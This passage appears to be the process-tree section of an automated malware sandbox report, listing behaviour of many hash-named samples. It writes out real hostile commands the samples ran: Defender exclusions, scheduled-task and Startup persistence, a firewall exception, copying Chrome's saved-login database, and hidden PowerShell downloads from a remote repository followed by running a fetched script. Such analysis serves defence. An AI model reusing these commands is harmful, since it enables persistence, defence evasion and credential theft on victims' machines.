      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=59FB5160D26394F31C9BABA9C2CBF396 --mojo-platform-channel-handle=2460 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      PID:2788
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=89A204ADF40E0B6D332F4745EBFD0971 --mojo-platform-channel-handle=2464 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      PID:2860
- C:\Users\Admin\Desktop\2023-09-04\0e0e5c2cfdabbea0c06dc0469d2025057d381cbc531d3c7799a88336c33d4132.exe
  "C:\Users\Admin\Desktop\2023-09-04\0e0e5c2cfdabbea0c06dc0469d2025057d381cbc531d3c7799a88336c33d4132.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:4404
- - C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe
    "C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops autorun.inf file
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    PID:4576
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe" "yatvoumatyxyebal.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      PID:4196
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
      dw20.exe -x -s 2032
      4⤵
      PID:6844
- C:\Users\Admin\Desktop\2023-09-04\0e8ce281e417e03f6a428d872d9b0b7997f5063b259f520b51234c16c87dd0e3.exe
  "C:\Users\Admin\Desktop\2023-09-04\0e8ce281e417e03f6a428d872d9b0b7997f5063b259f520b51234c16c87dd0e3.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4192
- C:\Users\Admin\Desktop\2023-09-04\2b04a8ff2faa3346370bc021df7c81c78a688c00a4e67a1f64580e5a14501bee.exe
  "C:\Users\Admin\Desktop\2023-09-04\2b04a8ff2faa3346370bc021df7c81c78a688c00a4e67a1f64580e5a14501bee.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  PID:2656
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c ipconfig /release
    3⤵
    PID:744
  - - C:\Windows\SysWOW64\ipconfig.exe
      ipconfig /release
      4⤵
      Gathers network information
      PID:1976
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c ipconfig /renew
    3⤵
    PID:3836
  - - C:\Windows\SysWOW64\ipconfig.exe
      ipconfig /renew
      4⤵
      Gathers network information
      PID:4868
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    3⤵
    - Accesses Microsoft Outlook profiles
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - outlook_office_path
    - outlook_win_path
    PID:4172
- C:\Users\Admin\Desktop\2023-09-04\5e184f6a7be1ee66c1bb770b66cf475c09d7ab4baaf36f9e0203041fc7098717.exe
  "C:\Users\Admin\Desktop\2023-09-04\5e184f6a7be1ee66c1bb770b66cf475c09d7ab4baaf36f9e0203041fc7098717.exe"
  2⤵
  - Executes dropped EXE
  PID:1400
- C:\Users\Admin\Desktop\2023-09-04\06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe
  "C:\Users\Admin\Desktop\2023-09-04\06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe"
  2⤵
  - Checks QEMU agent file
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Suspicious behavior: MapViewOfSection
  PID:4652
- - C:\Users\Admin\Desktop\2023-09-04\06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe
    "C:\Users\Admin\Desktop\2023-09-04\06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe"
    3⤵
    - Checks QEMU agent file
    - Loads dropped DLL
    - Suspicious use of NtCreateThreadExHideFromDebugger
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:3376
- C:\Users\Admin\Desktop\2023-09-04\6f89a16231002ca16d388f2fee2ad80acca8c9e7e12d5f778881ac352c35dd8a.exe
  "C:\Users\Admin\Desktop\2023-09-04\6f89a16231002ca16d388f2fee2ad80acca8c9e7e12d5f778881ac352c35dd8a.exe"
  2⤵
  - Executes dropped EXE
  PID:896
- C:\Users\Admin\Desktop\2023-09-04\7c24993316855b8e855a8ea660369bf117784e27a9cf850e3936ff1e19250d8f.exe
  "C:\Users\Admin\Desktop\2023-09-04\7c24993316855b8e855a8ea660369bf117784e27a9cf850e3936ff1e19250d8f.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3876
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3876 -s 1416
    3⤵
    - Program crash
    PID:4536
- C:\Users\Admin\Desktop\2023-09-04\9a9c8c815e41e4173ef0ca4ae518d232bc3dbc5e6e62d565cf52620ab6d0a6fc.exe
  "C:\Users\Admin\Desktop\2023-09-04\9a9c8c815e41e4173ef0ca4ae518d232bc3dbc5e6e62d565cf52620ab6d0a6fc.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  PID:4672
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\2023-09-04\9a9c8c815e41e4173ef0ca4ae518d232bc3dbc5e6e62d565cf52620ab6d0a6fc.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1844
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\pIQwCnkHxxbR.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2752
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pIQwCnkHxxbR" /XML "C:\Users\Admin\AppData\Local\Temp\tmp921C.tmp"
    3⤵
    - Creates scheduled task(s)
    PID:544
- - C:\Users\Admin\Desktop\2023-09-04\9a9c8c815e41e4173ef0ca4ae518d232bc3dbc5e6e62d565cf52620ab6d0a6fc.exe
    "C:\Users\Admin\Desktop\2023-09-04\9a9c8c815e41e4173ef0ca4ae518d232bc3dbc5e6e62d565cf52620ab6d0a6fc.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
    PID:3876
- C:\Users\Admin\Desktop\2023-09-04\14eb5c233e173d7d387b37bcec81fa6f3a6a2485e6f6a174f0e72100872aeb66.exe
  "C:\Users\Admin\Desktop\2023-09-04\14eb5c233e173d7d387b37bcec81fa6f3a6a2485e6f6a174f0e72100872aeb66.exe"
  2⤵
  - Looks for VirtualBox Guest Additions in registry
  - Looks for VMWare Tools registry key
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Adds Run key to start application
  - Maps connected drives based on registry
  - Suspicious use of AdjustPrivilegeToken
  PID:928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF772.tmp.bat""
    3⤵
    PID:4432
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:5032
  - - C:\Users\Admin\AppData\Roaming\svchost.exe
      "C:\Users\Admin\AppData\Roaming\svchost.exe"
      4⤵
      Looks for VirtualBox Guest Additions in registry
      Looks for VMWare Tools registry key
      Checks BIOS information in registry
      Executes dropped EXE
      Maps connected drives based on registry
      Suspicious use of AdjustPrivilegeToken
      PID:4148
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Roaming\svchost.exe"' & exit
    3⤵
    PID:4776
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Roaming\svchost.exe"'
      4⤵
      Creates scheduled task(s)
      PID:2844
- C:\Users\Admin\Desktop\2023-09-04\38d0c2cf38e1dcaca20a6d79903a6075d171d2b31c980c4a789965a783b23b49.exe
  "C:\Users\Admin\Desktop\2023-09-04\38d0c2cf38e1dcaca20a6d79903a6075d171d2b31c980c4a789965a783b23b49.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of SetWindowsHookEx
  PID:2860
- - C:\Users\Admin\Desktop\2023-09-04\38d0c2cf38e1dcaca20a6d79903a6075d171d2b31c980c4a789965a783b23b49.exe
    "C:\Users\Admin\Desktop\2023-09-04\38d0c2cf38e1dcaca20a6d79903a6075d171d2b31c980c4a789965a783b23b49.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: MapViewOfSection
    PID:4952
  - - C:\Windows\SysWOW64\svchost.exe
      "svchost.exe"
      4⤵
      Looks for VirtualBox Guest Additions in registry
      Adds policy Run key to start application
      Looks for VMWare Tools registry key
      Checks BIOS information in registry
      Adds Run key to start application
      Maps connected drives based on registry
      Modifies Internet Explorer settings
      Suspicious behavior: MapViewOfSection
      PID:2636
    - - C:\Windows\SysWOW64\svchost.exe
        
        "C:\Windows\SysWOW64\svchost.exe"
        5⤵
        
        PID:3540
    - - C:\Windows\SysWOW64\explorer.exe
        
        "explorer.exe"
        5⤵
        
        PID:2228
- C:\Users\Admin\Desktop\2023-09-04\49dedf19d0d69cc9c0247803d3748ccf25b2c17504f6e07c48a84d8515ec1575.exe
  "C:\Users\Admin\Desktop\2023-09-04\49dedf19d0d69cc9c0247803d3748ccf25b2c17504f6e07c48a84d8515ec1575.exe"
  2⤵
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:3176
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/YimMenu/YimMenu/issues/new/choose
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:3444
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd45b346f8,0x7ffd45b34708,0x7ffd45b34718
      4⤵
      PID:3272
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,17803311037409036651,10679173951299461945,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3
      4⤵
      PID:4340
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,17803311037409036651,10679173951299461945,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:2
      4⤵
      PID:4572
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,17803311037409036651,10679173951299461945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2784 /prefetch:8
      4⤵
      PID:5080
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,17803311037409036651,10679173951299461945,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1
      4⤵
      PID:2836
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,17803311037409036651,10679173951299461945,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
      4⤵
      PID:4388
- C:\Users\Admin\Desktop\2023-09-04\49dedf19d0d69cc9c0247803d3748ccf25b2c17504f6e07c48a84d8515ec1575.exe
  "C:\Users\Admin\Desktop\2023-09-04\49dedf19d0d69cc9c0247803d3748ccf25b2c17504f6e07c48a84d8515ec1575.exe"
  2⤵
  - Executes dropped EXE
  PID:1768
- C:\Users\Admin\Desktop\2023-09-04\56a9c01b92c732b5581d84d366e37339503d8b99f966e99cea6bfcacd73864ec.exe
  "C:\Users\Admin\Desktop\2023-09-04\56a9c01b92c732b5581d84d366e37339503d8b99f966e99cea6bfcacd73864ec.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:1532
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\eWFNFYkXygiAi.exe"
    3⤵
    PID:3636
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eWFNFYkXygiAi" /XML "C:\Users\Admin\AppData\Local\Temp\tmpF507.tmp"
    3⤵
    - Creates scheduled task(s)
    PID:4536
- - C:\Users\Admin\Desktop\2023-09-04\56a9c01b92c732b5581d84d366e37339503d8b99f966e99cea6bfcacd73864ec.exe
    "C:\Users\Admin\Desktop\2023-09-04\56a9c01b92c732b5581d84d366e37339503d8b99f966e99cea6bfcacd73864ec.exe"
    3⤵
    - Executes dropped EXE
    PID:2928
- C:\Users\Admin\Desktop\2023-09-04\74bbf54c84c8a59a0f2f99487122908d30a5f04c32f16b633ff09e27a55273d6.exe
  "C:\Users\Admin\Desktop\2023-09-04\74bbf54c84c8a59a0f2f99487122908d30a5f04c32f16b633ff09e27a55273d6.exe"
  2⤵
  - Executes dropped EXE
  PID:4676
- - C:\Users\Admin\AppData\Local\Temp\ufclwciske.exe
    "C:\Users\Admin\AppData\Local\Temp\ufclwciske.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: MapViewOfSection
    PID:5092
  - - C:\Users\Admin\AppData\Local\Temp\ufclwciske.exe
      "C:\Users\Admin\AppData\Local\Temp\ufclwciske.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      PID:2516
- C:\Users\Admin\Desktop\2023-09-04\491b9d7756207e0bf6193028df506a3d3a4e2ee433f508cc262b364293b6e795.exe
  "C:\Users\Admin\Desktop\2023-09-04\491b9d7756207e0bf6193028df506a3d3a4e2ee433f508cc262b364293b6e795.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:4948
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4248
- - C:\Users\Admin\AppData\Local\Temp\ChromeClose.exe
    "C:\Users\Admin\AppData\Local\Temp\ChromeClose.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4532
- C:\Windows\SysWOW64\systray.exe
  "C:\Windows\SysWOW64\systray.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  PID:1044
- - C:\Windows\SysWOW64\cmd.exe
    /c del "C:\Users\Admin\AppData\Local\Temp\ufclwciske.exe"
    3⤵
    PID:4680
- - C:\Windows\SysWOW64\cmd.exe
    /c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V
    3⤵
    PID:6136
- - C:\Program Files\Mozilla Firefox\Firefox.exe
    "C:\Program Files\Mozilla Firefox\Firefox.exe"
    3⤵
    PID:1644
- C:\Users\Admin\Desktop\2023-09-04\689e96c2e6efebbf0cd6c69bf01cd997a4e50bb1adc729d90ca26d49b4387fac.exe
  "C:\Users\Admin\Desktop\2023-09-04\689e96c2e6efebbf0cd6c69bf01cd997a4e50bb1adc729d90ca26d49b4387fac.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4816
- C:\Users\Admin\Desktop\2023-09-04\7290bd84fb89cb251cef8db17aecf3f433b8ee2641cc2109026c77b519f8452e.exe
  "C:\Users\Admin\Desktop\2023-09-04\7290bd84fb89cb251cef8db17aecf3f433b8ee2641cc2109026c77b519f8452e.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:4596
- C:\Users\Admin\Desktop\2023-09-04\9025cbcf8f758c9c16cf199ecd45576f61b00921701829343a607336b8e9a2cb.exe
  "C:\Users\Admin\Desktop\2023-09-04\9025cbcf8f758c9c16cf199ecd45576f61b00921701829343a607336b8e9a2cb.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:2716
- - C:\Users\Admin\Desktop\2023-09-04\9025cbcf8f758c9c16cf199ecd45576f61b00921701829343a607336b8e9a2cb.exe
    "C:\Users\Admin\Desktop\2023-09-04\9025cbcf8f758c9c16cf199ecd45576f61b00921701829343a607336b8e9a2cb.exe"
    3⤵
    PID:5276
- C:\Users\Admin\Desktop\2023-09-04\9477b580ea937f47e54b9d6b022617c2e508fbed2f74f6ac3ed54c7861bf8b2d.exe
  "C:\Users\Admin\Desktop\2023-09-04\9477b580ea937f47e54b9d6b022617c2e508fbed2f74f6ac3ed54c7861bf8b2d.exe"
  2⤵
  PID:1844
- - C:\Users\Admin\Desktop\2023-09-04\9477b580ea937f47e54b9d6b022617c2e508fbed2f74f6ac3ed54c7861bf8b2d.exe
    "C:\Users\Admin\Desktop\2023-09-04\9477b580ea937f47e54b9d6b022617c2e508fbed2f74f6ac3ed54c7861bf8b2d.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks processor information in registry
    PID:2084
- C:\Users\Admin\Desktop\2023-09-04\9506cdc2e1dcfdbc7b8be00e12b5bd2e4a2f6b10df353bb19f3affaaaaeafd30.exe
  "C:\Users\Admin\Desktop\2023-09-04\9506cdc2e1dcfdbc7b8be00e12b5bd2e4a2f6b10df353bb19f3affaaaaeafd30.exe"
  2⤵
  PID:2276
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\2023-09-04\38348d68f5d74a0babf439107a11206ec804c9358185c08ecb1fddb89c51e1f7.cmd" "
  2⤵
  PID:4808
- - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://gitlab.com/brum/teamfor/-/raw/main/st -OutFile "C:\\Users\\$([Environment]::UserName)\\AppData\\Roaming\\Microsoft\\Windows\\'Start Menu'\\Programs\\Startup\\WindowsSecure.bat";
    3⤵
    PID:2252
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.alibaba.com/
    3⤵
    PID:4768
- - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://gitlab.com/brum/teamfor/-/raw/main/Document.zip -OutFile C:\\Users\\Public\\Document.zip;
    3⤵
    PID:3432
- - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden Expand-Archive C:\\Users\\Public\\Document.zip -DestinationPath C:\\Users\\Public\\Document;
    3⤵
    PID:3368
- - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://gitlab.com/brum/teamfor/-/raw/main/achung -OutFile C:\\Users\\Public\\Document\\project.py;
    3⤵
    PID:4204
- - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden C:\\Users\\Public\\Document\\python C:\\Users\\Public\\Document\\project.py;
    3⤵
    PID:3556
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.alibaba.com/
    3⤵
    PID:5612
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd465c9758,0x7ffd465c9768,0x7ffd465c9778
      4⤵
      PID:3820
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1744 --field-trial-handle=1888,i,14954713582988396088,10470241304696319683,131072 /prefetch:2
      4⤵
      PID:4024
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2084 --field-trial-handle=1888,i,14954713582988396088,10470241304696319683,131072 /prefetch:8
      4⤵
      PID:1716
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3024 --field-trial-handle=1888,i,14954713582988396088,10470241304696319683,131072 /prefetch:1
      4⤵
      PID:5876
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3016 --field-trial-handle=1888,i,14954713582988396088,10470241304696319683,131072 /prefetch:1
      4⤵
      PID:5460
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1888,i,14954713582988396088,10470241304696319683,131072 /prefetch:8
      4⤵
      PID:3824
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2784 --field-trial-handle=1888,i,14954713582988396088,10470241304696319683,131072 /prefetch:2
      4⤵
      PID:6060
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4660 --field-trial-handle=1888,i,14954713582988396088,10470241304696319683,131072 /prefetch:8
      4⤵
      PID:2868
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4640 --field-trial-handle=1888,i,14954713582988396088,10470241304696319683,131072 /prefetch:8
      4⤵
      PID:3872
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2712 --field-trial-handle=1888,i,14954713582988396088,10470241304696319683,131072 /prefetch:8
      4⤵
      PID:1984
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
